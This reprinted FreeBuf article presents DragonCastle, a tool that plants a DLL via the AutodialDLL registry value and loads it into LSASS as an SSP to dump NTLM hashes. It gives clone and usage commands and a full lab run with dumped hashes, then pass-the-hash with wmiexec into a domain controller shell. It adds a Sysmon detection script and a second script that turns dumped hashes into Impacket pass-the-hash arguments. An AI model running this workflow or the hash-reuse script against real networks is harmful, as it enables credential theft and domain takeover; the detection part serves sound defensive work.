![Figure 1: How to use DragonCastle to extract NTLM hashes from the LSASS process - NGC660 Security Lab](https://image.3001.net/images/20230411/1681221166_6435662e255dee02fa352.png!small)
About DragonCastle
DragonCastle is a security tool that chains the AutodialDLL lateral-movement technique with a Security Support Provider (SSP) load. It is meant to help researchers extract NTLM hashes from the LSASS process.
The tool uploads a DLL to the target host, then enables the Remote Registry service to rewrite the AutodialDLL registry value (under HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters, a value consulted by ws2_32.dll) and starts or restarts the BITS service. The svchost.exe process hosting BITS loads the planted DLL; the DLL restores AutodialDLL to its default value and then issues an RPC request to LSASS that forces it to load the same DLL as a Security Support Provider. Once the DLL is running inside LSASS, it scans the process memory and extracts the NTLM hashes together with the key/IV material needed to decrypt them. Two practical points: the whole chain needs credentials with local administrator rights on the target (the file upload to C:\, the Remote Registry access and the service control all require them), and an LSASS running as a protected process (RunAsPPL) refuses to load an unsigned SSP, so the dump is expected to fail on hosts configured that way.
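The registry step above is the noisiest part of the chain and is cheap to detect: the AutodialDLL value is written to a non-default DLL and then put back to its default, rasadhlp.dll, within seconds. The following is an added example (not DragonCastle code) that scans Sysmon Event ID 13 (registry value set) records for exactly that pattern. The key=value|key=value line format and the four sample events are constructed here; real Sysmon output is XML or JSON and needs its own loader, and the svchost.exe image paths in the samples are an assumption about how the Remote Registry and BITS hosts appear in the log.

```python
"""Detect AutodialDLL tampering of the kind described above.

Added example, not DragonCastle's own code. Consumes Sysmon Event ID 13
records in a constructed key=value|key=value line format.
"""
import re
from datetime import datetime, timedelta

AUTODIAL_KEY = re.compile(r"\\WinSock2\\Parameters\\AutodialDLL$", re.IGNORECASE)
DEFAULT_AUTODIAL = "rasadhlp.dll"  # stock Windows value of the AutodialDLL entry
# A DragonCastle-style run sets a rogue value and restores the default within
# seconds; pairing the two writes inside this window strengthens the alert.
REVERT_WINDOW = timedelta(minutes=5)

# Constructed sample log: one rogue write plus its revert on WINTERFELL, and a
# benign write of the default value on another host that must not alert.
SAMPLE_EVENTS = [
    r"UtcTime=2023-04-11 09:15:02|EventID=13|Computer=WINTERFELL|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL|Details=c:\dump.dll",
    r"UtcTime=2023-04-11 09:15:31|EventID=13|Computer=WINTERFELL|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL|Details=rasadhlp.dll",
    r"UtcTime=2023-04-11 10:02:10|EventID=13|Computer=KINGSLANDING|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL|Details=%SystemRoot%\System32\rasadhlp.dll",
    r"UtcTime=2023-04-11 10:03:00|EventID=13|Computer=KINGSLANDING|Image=C:\Windows\regedit.exe|TargetObject=HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\EnableAutodial|Details=DWORD (0x00000000)",
]


def parse_event(line):
    """Split one key=value|... line into a dict with a typed time and event ID."""
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    fields["UtcTime"] = datetime.strptime(fields["UtcTime"], "%Y-%m-%d %H:%M:%S")
    fields["EventID"] = int(fields["EventID"])
    return fields


def is_default_autodial(details):
    """True if the written value resolves to rasadhlp.dll, as a bare name or a full path."""
    name = details.strip().strip('"').rsplit("\\", 1)[-1]
    return name.lower() == DEFAULT_AUTODIAL


def find_autodial_tampering(lines):
    """Return one alert per non-default AutodialDLL write, noting a quick revert."""
    writes = [
        e for e in map(parse_event, lines)
        if e["EventID"] == 13 and AUTODIAL_KEY.search(e["TargetObject"])
    ]
    writes.sort(key=lambda e: e["UtcTime"])
    alerts = []
    for i, e in enumerate(writes):
        if is_default_autodial(e["Details"]):
            continue
        alert = {"host": e["Computer"], "time": e["UtcTime"], "writer": e["Image"],
                 "dll": e["Details"], "reverted_after": None}
        # Look for the restore-to-default write that the planted DLL performs.
        for later in writes[i + 1:]:
            if (later["Computer"] == e["Computer"]
                    and is_default_autodial(later["Details"])
                    and later["UtcTime"] - e["UtcTime"] <= REVERT_WINDOW):
                alert["reverted_after"] = later["UtcTime"] - e["UtcTime"]
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_autodial_tampering(SAMPLE_EVENTS):
        print(f"{a['host']}: AutodialDLL set to {a['dll']} by {a['writer']} "
              f"at {a['time']:%H:%M:%S}, reverted after {a['reverted_after']}")
```

A write that is reverted within the window is the stronger signal; a rogue value that stays in place is the older persistence use of the same key and still deserves an alert, which is why the revert is recorded as an attribute rather than used as a filter.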
Supported operating system versions

| OS version | Supported |
| --- | --- |
| Windows 10 version 21H2 | |
| Windows 10 version 21H1 | Supported |
| Windows 10 version 20H2 | Supported |
| Windows 10 version 20H1 (2004) | Supported |
| Windows 10 version 1909 | Supported |
| Windows 10 version 1903 | Supported |
| Windows 10 version 1809 | Supported |
| Windows 10 version 1803 | Supported |
| Windows 10 version 1709 | Supported |
| Windows 10 version 1703 | Supported |
| Windows 10 version 1607 | Supported |
| Windows 10 version 1511 | |
| Windows 10 version 1507 | |
| Windows 8 | |
| Windows 7 | |
Tool download
The tool runs on Python 3, so install and configure a Python 3 environment on the local machine first. Clone the project source with:

```shell
git clone https://github.com/mdsecactivebreach/DragonCastle.git
```
Usage help

```
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -h
DragonCastle - @TheXC3LL

usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password
  -d DOMAIN, --domain DOMAIN
                        valid domain
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes
  -no-pass              do not prompt for a password
  -k                    use Kerberos authentication
  -dc-ip ip address     IP address of the domain controller
  -target-ip ip address IP address of the target machine
  -local-dll dll to plant
                        local path of the DLL to upload
  -remote-dll dll location
                        remote path written into the AutodialDLL registry value
```
Usage example
The Windows member server at 192.168.56.20 is the dump target; the domain controller is at 192.168.56.10. The run below dumps LSASS on the member server, and the hash recovered for eddard.stark is then used for pass-the-hash against the domain controller with Impacket's wmiexec.py:

```
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL

[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
============
[+] Deleting DLL
[^] Have a nice day!
```
```
psyconauta@insulanova:~/Research/dragoncastle|⇒ wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>
```
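The "Parsing creds" section of the dump repeats entries, lists logon sessions that carry no hash, and prints the same hash under several principals, so the operator has to tidy it before feeding it to Impacket. The following is an added example (not DragonCastle code) that parses that output into unique pass-the-hash candidates and emits them in the `-hashes :NTHASH DOMAIN/user@host` form used by the wmiexec.py command above. The embedded sample is the credential section of the run shown above, copied in the flattened single-line form in which the page reproduced it; the normaliser also accepts the tool's one-field-per-line output.

```python
"""Turn DragonCastle's "Parsing creds" output into unique pass-the-hash targets.

Added example, not part of DragonCastle. SAMPLE_OUTPUT is the credential
section of the run above, in the flattened form the page prints it in.
"""
import re

SAMPLE_OUTPUT = (
    "[+] Parsing creds: ============ ---- User: vagrant Domain: WINTERFELL ---- "
    "User: vagrant Domain: WINTERFELL ---- User: eddard.stark Domain: SEVENKINGDOMS "
    "NTLM: d977b98c6c9282c5c478be1d97b237b8 ---- User: eddard.stark Domain: SEVENKINGDOMS "
    "NTLM: d977b98c6c9282c5c478be1d97b237b8 ---- User: vagrant Domain: WINTERFELL "
    "NTLM: e02bc503339d51f71d913c245d35b50b ---- User: DWM-1 Domain: Window Manager "
    "NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: DWM-1 Domain: Window Manager "
    "NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: WINTERFELL$ Domain: SEVENKINGDOMS "
    "NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: UMFD-0 Domain: Font Driver Host "
    "NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: Domain: "
    "NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: Domain: ============ [+] Deleting DLL"
)

NTHASH = re.compile(r"^[0-9a-fA-F]{32}$")


def normalize(text):
    """Put every field and separator on its own line, whether or not it already is."""
    return re.sub(r"\s*(User:|Domain:|NTLM:|----|=+|\[\+\])", r"\n\1", text)


def parse_creds(text):
    """Return one {'User','Domain','NTLM'} dict per '----' delimited block."""
    records, cur = [], {}
    for line in normalize(text).splitlines():
        line = line.strip()
        if line.startswith("----") or line.startswith("="):
            if cur:
                records.append(cur)
            cur = {}
        elif ":" in line:
            key, _, value = line.partition(":")
            if key in ("User", "Domain", "NTLM"):
                cur[key] = value.strip()
    if cur:
        records.append(cur)
    return records


def pth_candidates(records):
    """Deduplicate and drop entries without a usable hash or principal.

    A record with no NTLM field is a logon session without a cached hash, and a
    record with an empty user cannot be targeted, so both are discarded.
    """
    seen, out = set(), []
    for r in records:
        user, domain, nthash = r.get("User", ""), r.get("Domain", ""), r.get("NTLM", "")
        if not user or not NTHASH.match(nthash):
            continue
        key = (domain.lower(), user.lower(), nthash.lower())
        if key in seen:
            continue
        seen.add(key)
        out.append({"domain": domain, "user": user, "nthash": nthash.lower()})
    return out


def principals_by_hash(creds):
    """Group principals that share one NT hash, so repeated entries read as one credential."""
    groups = {}
    for c in creds:
        groups.setdefault(c["nthash"], []).append(f"{c['domain']}\\{c['user']}")
    return groups


def impacket_args(cred, target_ip):
    """Format a record the way wmiexec.py/psexec.py take it: -hashes :NT DOMAIN/user@host."""
    return f"-hashes :{cred['nthash']} {cred['domain']}/{cred['user']}@{target_ip}"


if __name__ == "__main__":
    creds = pth_candidates(parse_creds(SAMPLE_OUTPUT))
    for c in creds:
        print(impacket_args(c, "192.168.56.10"))
    for nthash, who in principals_by_hash(creds).items():
        print(nthash, "->", ", ".join(who))
```

On this run the grouping shows that DWM-1, UMFD-0 and WINTERFELL$ all carry 5f4b70b59ca2d9fb8fa1bf98b50f5590, so they are one credential (the computer account) rather than three, which leaves eddard.stark, vagrant and the machine account as the distinct hashes worth reusing.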
Project
DragonCastle: https://github.com/mdsecactivebreach/DragonCastle
References
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
https://adepts.of0x.cc/physical-graffiti-lsass/
Author: Alpha_h4ck
Reprinted from FreeBuf.COM